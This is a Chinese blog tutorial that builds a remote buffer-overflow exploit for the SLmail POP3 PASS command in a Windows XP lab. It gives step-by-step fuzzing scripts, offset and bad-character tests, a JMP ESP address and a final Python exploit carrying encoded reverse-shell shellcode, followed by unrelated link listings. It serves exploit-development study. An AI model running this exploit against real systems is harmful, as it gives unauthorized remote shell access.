缓冲区溢出是什么?

当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被“撑爆”,从而覆盖了相邻内存区域的数据

成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果

POP3   PASS 命令存在缓冲区溢出漏洞   无需身份验证实现远程代码执行


软件

slmail          http://slmail.software.informer.com/5.5/

mona.py      https://github.com/corelan/mona

immunity debugger      https://www.immunityinc.com/products/debugger/


系统环境

kali 2.0

windows XP sp3


首先默认配置安装好软件,吧mona.py移动至debugger目录下的PyCommands文件夹里

在系统服务里打开 Seattle Lab POP3 Server

在kali中使用nc查看XP机器的110端口,回弹正确的话会有这样

就是测试这里会不会有缓冲区溢出

命令可以有 USER xxx 或者 PASS  xxx

可以写个python脚本来实现这个基本功能

  1. #!/usr/bin/python
  2.  
  3. import socket
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5.  
  6. try:
  7. print "\n[*]Sending evil buffer..."
  8. s.connect(("192.168.116.139",110))
  9. data = s.recv(1024)
  10. print data
  11. s.send("USER test"+"\r\n")
  12. data = s.recv(1024)
  13. print data
  14. s.send("PASS test\r\n")
  15. data = s.recv(1024)
  16. print data
  17. s.close()
  18. print "\n[*]Done"
  19. except:
  20. print "\n[*]Could not connect to POP3!"

我们打开 immunity debugger,file->attach->

选择哪个监听110端口的SLmail进程,然后attach

此时程序是被暂停的,右下角的paused可以看出,单击在工具栏上类似播放的按钮,启动程序

然后构造如下脚本测试大概多少字节会溢出

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. buffer=["A"]
  5. counter=100
  6.  
  7. while len(buffer) <= 50:
  8. buffer.append("A"*counter)
  9. counter+=200
  10.  
  11. for string in buffer:
  12. print "[*]Fuzzing PASS with %s bytes" % len(string)
  13. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  14. connect = s.connect(('192.168.116.139',110))
  15. s.recv(1024)
  16. s.send('USER test'+'\r\n')
  17. s.recv(1024)
  18. s.send('PASS ' + string + '\r\n')
  19. s.send('QUIT'+'\r\n')
  20. s.close()

运行一下

2900发送了很久没有结果,说明程序已经崩溃了,回到xp看一下,可以看到程序已经停止,右下角有running变成了paused

把debugger重开,pop3服务重开,然后再attach再running再测试

这时候可以手工测试一下,发个2700字节的

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer = "A" * 2700
  6. try:
  7. print "\n[*]Sending evil buffer..."
  8. s.connect(("192.168.116.139",110))
  9. data = s.recv(1024)
  10. print data
  11.  
  12. s.send("USER Xuan"+"\r\n")
  13. data = s.recv(1024)
  14. print data
  15.  
  16. s.send("PASS " + buffer + "\r\n")
  17. data = s.recv(1024)
  18. print data
  19.  
  20. s.close()
  21. print "\n[*]Done"
  22. except:
  23. print "\n[*]Could not connect to POP3!"

这时候程序已经崩溃,看一下xp界面

可以看到字节已经覆盖EIP,现在要做的就是要具体到EIP是从第多少个字符开始被覆盖的

这里可以用kali的一个工具生成不带重样的字符串

  1. cd /usr/share/metasploit-framework/tools/exploit/
  2. ./pattern_create.rb -l

会得到2700字节的不带重样的字符串

复制进python脚本,把第三个脚本buffer内容改成这串就行

xp那边准备好,运行一下

可以看到EIP的数值是39694438

这里需要注意的是在内存中地址和书写的不太一样,高地址放低位而低地址放高位

所以实际数值是38 44 69 39

换算成ascii码是 8Di9

你可以在文本编辑器里把之前的字符串复制进去然后查找这个的位置然后减一

也可以利用工具计算偏移量

  1. cd /usr/share/metasploit-framework/tools/exploit/
  2. ./pattern_offset.rb -q

这里之前有2606个字符

也就是从2607个开始的覆盖到了EIP的地址

然后写个脚本确认一下是否正确

  1. #!/usr/bin/python
  2.  
  3. import socket
  4.  
  5. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  6. buffer = "A"*2606 + "B"*4 + "C"*20
  7.  
  8. try:
  9. print "\n[*]Sending evil buffer..."
  10. s.connect(("192.168.116.139",110))
  11. data = s.recv(1024)
  12. s.send("USER test"+"\r\n")
  13. data = s.recv(1024)
  14. s.send("PASS "+buffer+"\r\n")
  15. print "\n[*]Done!."
  16. except:
  17. print "\n[*]Could not connect to POP3!"

运行

可以看到,本来就写了四个B(ascii是42),刚好填充进EIP的地址,说明之前的实验结果正确

也就是已经可以控制程序下一条执行命令的地址

然后要做的就是把想要的shellcode写入目标地址里,接着需要寻找可写shellcode的空间

刚才在B之后还有C,看上图,C被写在了ESP

构造如下脚本测试ESP的能写多少

  1. #!/usr/bin/python
  2.  
  3. import socket
  4.  
  5. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  6. buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
  7.  
  8. try:
  9. print "\n[*]Sending evil buffer..."
  10. s.connect(("192.168.116.139",110))
  11. data = s.recv(1024)
  12. s.send("USER test"+"\r\n")
  13. data = s.recv(1024)
  14. s.send("PASS "+buffer+"\r\n")
  15. print "\n[*]Done!."
  16. except:
  17. print "\n[*]Could not connect to POP3!"

3500是构造的数值,2606是A,4是B,运行

EIP依然是精准的四个B,而我们的C在ESP则一大串,在ESP地址右键 Follow in Dump

在左下角查看,找到B和C的交接地方

从01F7A154开始就是ESP的内容地址,一直拉到结束

01F7A2FC就是结束地址,用自带的计算器算一下

十六进制计算结果转为十进制,是424

shellcode一般需要300多字节,也就是说ESP这里完全够放下shellcode

但是在实际操作中,会有一些特别字符, 比如

null  byte  (0x00) 空字符,用于终止字符串的拷贝操作

return  (0x0D) 回车操作,表示POP3 PASS 命令输入完成

等等,还有程序自定义的特殊字符,我们需要测试出这些特殊字符,以免shellcode异常

而这些字符最多只有256个,也就是从00000000到11111111的全部,我们可以一一测试

构造如下脚本

  1. #!/usr/bin/python
  2.  
  3. import socket
  4.  
  5. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  6. badchars = (
  7. "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" +
  8. "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
  9. "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" +
  10. "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" +
  11. "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f" +
  12. "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" +
  13. "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f" +
  14. "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" +
  15. "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f" +
  16. "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" +
  17. "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf" +
  18. "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" +
  19. "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf" +
  20. "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" +
  21. "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" +
  22. "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
  23. )
  24.  
  25. buffer = "A"*2606 + "B"*4 + badchars
  26.  
  27. try:
  28. print "\n[*]Sending evil buffer..."
  29. s.connect(("192.168.116.139",110))
  30. data = s.recv(1024)
  31. s.send("USER test"+"\r\n")
  32. data = s.recv(1024)
  33. s.send("PASS "+buffer+"\r\n")
  34. print "\n[*]Done!."
  35. except:
  36. print "\n[*]Could not connect to POP3!"

可以反复测试,在ESP中查看具体,缺少哪个字符,或者到哪停止,替换为别的字符没问题,就代表那个字符有问题,有特殊含义,不能写在shellcode

实验中坏字符为:0x00  0x0D 0x0A

坏字符不多,写入一个shellcode是完全可能的,现在只要把ESP的地址写在EIP,就可以执行shellcode从而拿到shell

然而实际中,ESP的地址不固定,不能写死ESP,这时候需要固定的地址来跳转

比如操作系统的一些模块,有些地址是固定的,不随着任何东西改变,我们可以利用固定地址模块里的 JMP ESP命令跳转到ESP的动态地址

这时候需要用到mona.py

底下输入栏里输入 !mona modules

Rebase代表操作系统重启后内存地址是否发生变化,true代表变化

SafeSEH,ASLR,NXCompat 都是操作系统自带的安全保护机制,true代表是受保护的

OS Dll 代表是否是操作系统的模块,true代表是

我们选择前四列是false,最后一列是true的进程

比如选择slmfc.dll,我们需要查找这个进程有没有JMP ESP指令

因为JMP ESP是汇编指令,计算机并不识别,我们需要转换,回到kali执行命令

因为是十六进制,我们加上\x

执行 !mona find -s "\xff\xe4" -m slmfc.dll

找到19个

如果出现下图这样就换个进程接着找

双击任意一个,在内存数据框中,右键->Disassemble切换为汇编语言

如图,第一个就是我们要的地址  5F4A358F

为了测试这个地址是否可用,我们对这个地址增加一下功能

如图选择第一个选项设置断点,意思是访问到这个地址就终止

接着构造脚本测试

  1. #!/usr/bin/python
  2.  
  3. import socket
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer="a"*2606 + "\x8F\x35\x4A\x5F" + "C"*400
  6. try:
  7. print "[*]Sending evil buffer..."
  8. s.connect(("192.168.116.139",110))
  9. data = s.recv(1024)
  10. print data
  11.  
  12. s.send("USER Xuan"+"\r\n")
  13. data = s.recv(1024)
  14. print data
  15.  
  16. s.send("PASS " + buffer + "\r\n")
  17. data = s.recv(1024)
  18. print data
  19.  
  20. s.close()
  21. print "\nDone"
  22.  
  23. except:
  24. print "[*]Could not connect to POP3!"

需要注意的是地址是反过来写的,而且需要加\x

没问题的话会这么个结果,提示 在执行这个地址的时候内存断点

这就代表这个地址没问题

接下来我们生成shellcode来替换ESP的内容

为了过目标机防火墙,我们选择生成反向shell

  1. cd /usr/share/framework2/
  2. ./msfpayload -l #可以生成的shellcode的种类
  3. ./msfpayload win32_reverse LHOST= C

这里还有个问题就是之前说过的坏字符,不过我们可以利用另一个工具来替换,有时候也用来隐藏特征做免杀

  1. ./msfpayload win32_reverse LHOST= R | ./msfencode -b "\x00\x0a\x0d"

会类似这样

我们将shellcode写入脚本中

  1. #!/usr/bin/python
  2.  
  3. import socket
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. shellcode=(
  6. "\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd\x6f\x3b" +
  7. "\x2d\x83\xeb\xfc\xe2\xf4\x01\x05\xd0\x60\x15\x96\xc4\xd2\x02\x0f" +
  8. "\xb0\x41\xd9\x4b\xb0\x68\xc1\xe4\x47\x28\x85\x6e\xd4\xa6\xb2\x77" +
  9. "\xb0\x72\xdd\x6e\xd0\x64\x76\x5b\xb0\x2c\x13\x5e\xfb\xb4\x51\xeb" +
  10. "\xfb\x59\xfa\xae\xf1\x20\xfc\xad\xd0\xd9\xc6\x3b\x1f\x05\x88\x8a" +
  11. "\xb0\x72\xd9\x6e\xd0\x4b\x76\x63\x70\xa6\xa2\x73\x3a\xc6\xfe\x43" +
  12. "\xb0\xa4\x91\x4b\x27\x4c\x3e\x5e\xe0\x49\x76\x2c\x0b\xa6\xbd\x63" +
  13. "\xb0\x5d\xe1\xc2\xb0\x6d\xf5\x31\x53\xa3\xb3\x61\xd7\x7d\x02\xb9" +
  14. "\x5d\x7e\x9b\x07\x08\x1f\x95\x18\x48\x1f\xa2\x3b\xc4\xfd\x95\xa4" +
  15. "\xd6\xd1\xc6\x3f\xc4\xfb\xa2\xe6\xde\x4b\x7c\x82\x33\x2f\xa8\x05" +
  16. "\x39\xd2\x2d\x07\xe2\x24\x08\xc2\x6c\xd2\x2b\x3c\x68\x7e\xae\x2c" +
  17. "\x68\x6e\xae\x90\xeb\x45\x3d\xc7\x4f\xaf\x9b\x07\x3a\x91\x9b\x3c" +
  18. "\xb2\xcc\x68\x07\xd7\xd4\x57\x0f\x6c\xd2\x2b\x05\x2b\x7c\xa8\x90" +
  19. "\xeb\x4b\x97\x0b\x5d\x45\x9e\x02\x51\x7d\xa4\x46\xf7\xa4\x1a\x05" +
  20. "\x7f\xa4\x1f\x5e\xfb\xde\x57\xfa\xb2\xd0\x03\x2d\x16\xd3\xbf\x43" +
  21. "\xb6\x57\xc5\xc4\x90\x86\x95\x1d\xc5\x9e\xeb\x90\x4e\x05\x02\xb9" +
  22. "\x60\x7a\xaf\x3e\x6a\x7c\x97\x6e\x6a\x7c\xa8\x3e\xc4\xfd\x95\xc2" +
  23. "\xe2\x28\x33\x3c\xc4\xfb\x97\x90\xc4\x1a\x02\xbf\x53\xca\x84\xa9" +
  24. "\x42\xd2\x88\x6b\xc4\xfb\x02\x18\xc7\xd2\x2d\x07\xcb\xa7\xf9\x30" +
  25. "\x68\xd2\x2b\x90\xeb\x2d"
  26. )
  27. buffer="a"*2606 + "\x8F\x35\x4A\x5F" + "\x90" * 8 + shellcode
  28. try:
  29. print "[*]Sending evil buffer..."
  30. s.connect(("192.168.116.139",110))
  31. data = s.recv(1024)
  32. print data
  33.  
  34. s.send("USER Xuan"+"\r\n")
  35. data = s.recv(1024)
  36. print data
  37.  
  38. s.send("PASS " + buffer + "\r\n")
  39. data = s.recv(1024)
  40. print data
  41.  
  42. s.close()
  43. print "\nDone"
  44.  
  45. except:
  46. print "[*]Could not connect to POP3!"

这里加上了8个\x90,\x90在汇编是无操作的意思,为了保证shellcode的有效性,如果跳转过来第一位就是shellcode的内容,有可能前几位会被擦掉,纯属经验之谈

现在在xp不用开任何监听软件,打开slmail的服务就可以

我们在本机监听端口444,然后运行上边的脚本,没问题就会反弹一个shell

而且可以反复溢出反复注入

还需要注意的一点是,如果你是新版本metasploit,那么shellcode没问题,如果是旧版本,它的shellcode退出方式是exitprocess,会导致程序崩溃,生成时需要加上 EXITFUNC=thread

新版本的metasploit已经没有这个问题


这个漏洞很老,适合新手学习,整个过程需要反复的验证可靠性,不失是一个经典溢出案例

enjoy it

博客园 - windows下简单的缓冲区溢出


windows下简单的缓冲区溢出的更多相关文章

  1. Linux下简单的缓冲区溢出

    缓冲区溢出是什么? 科班出身,或者学过汇编的应该知道,当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被“撑爆”,从而覆盖了相邻内存区域的数据 成功修改内存数据,可造成进程劫持 ...

  2. 【微服务No.1】Consul服务发现在windows下简单使用

    基本介绍: 安装: 下载地址:https://www.consul.io/downloads.html 运行: consul agent -dev 显示这个界面说明已经开启成功. 页面显示: 然后访问 ...

  3. windows下简单安装postgres

    目前版本是PostgreSQL 9.6,它经过以下平台认证: 32位Windows Windows 7,8和10 Windows 2008 Server 64位Windows Windows 7,8和 ...

  4. Consul服务发现在windows下简单使用

    目录 基本介绍: 服务连接: 客户端: 系列章节: 回到顶部 基本介绍: 安装: 下载地址:https://www.consul.io/downloads.html 运行: consul agent ...

  5. 旧书重温:0day2【1】 简单的缓冲区溢出案例

    0x01 准备: VMwarePlayer (我是在360软件管家那搜到的下载的) xp sp2 http://user.qzone.qq.com/252738331/blog/1357138598 ...

  6. windows下简单验证码识别——完美验证码识别系统

    此文已由作者徐迪授权网易云社区发布. 欢迎访问网易云社区,了解更多网易技术产品运营经验. 讲到验证码识别,大家第一个可能想到tesseract.诚然,对于OCR而言,tesseract确实很强大,自带 ...

  7. windows下简单配置apache

    不得不做个笔记,不然每次配置都记不清楚... 详细的配置朋友这边写的很好.地址 # 对 PHP 4 LoadModule php4_module "c:/php/php4apache2.dl ...

  8. QT开发(二) windows下简单部署

    如果使用vs编译器 需要c runtime 例如(msvc110 )这种 还需要若干qt的dll 基本在qt的bin目录 如果使用了QWindow这种对象还需要引用qt目录 plugins下 的内容 ...

  9. windows下简单配置squid反向代理服务器

    下载windwosNT版本的squid下载地址: http://squid.acmeconsulting.it/download/squid-2.6.STABLE13-bin.zip 1.把squid ...

随机推荐

  1. 使用Linux的Crontab定时执行PHP脚本

    0 */6 * * * /home/kdb/php/bin/php /home/kdb/apache/htdocs/lklkdbplatform/kdb_release/Crontab/index.p ...

  2. 二、Laravel手动下载安装及初始化配置(此处以Laravel5.2为例)

    1.下载安装Laravel5.2的几种方法 —— 一键安装包下载: —— http://www.golaravel.com/download/ —— github下载 —— https://githu ...

  3. Java中array、List、Set互相转换

    数组转List String[] staffs = new String[]{"A", "B", "C"}; List staffsList ...

  4. Mac上Homebrew的安装

    Mac系统版本: 10.14.2 下载brew_install 访问:https://raw.githubusercontent.com/Homebrew/install/master/install ...

  5. Linux 安装 tomcat

    创建目录 cd /usr mkdir tomcat cd tomcat 上传 tomcat rz.ftp 或者 wget 都可以 解压 tar -xzvf apache-tomcat-8.0.53.t ...

  6. mybatis的三种批量插入以及次效率比较

    1.表结构 CREATE TABLE `t_user` ( `id` varchar(32) CHARACTER SET utf8 NOT NULL COMMENT '主键', `name` varc ...

  7. C# Params的使用

    using System; namespace Params { class Program { static void Main(string[] args) { PrintMany("H ...

  8. java最小公倍数与最大公约数

    import java.util.Scanner; /** * Created by Admin on 2017/3/26. */ public class test02 { public stati ...

  9. [20190401]那个更快的疑问.txt

    [20190401]那个更快的疑问.txt --//前一阵子,做了11g于10g下,单表单条记录唯一索引扫描的测试,摘要如下:--//参考链接:http://blog.itpub.net/267265 ...

  10. Dapp已来,如何把握区块链创富模式变化的趋势

    区块链技术持续升温,Dapp迅速成为焦点,未来区块链市场上新的蓝海.这么说当然不是空想出来的,而是从区块链市场的发展趋势中推断而来.区块链市场由最初的挖矿炒币到如今尝试投入行业应用,随着技术和应用模式 ...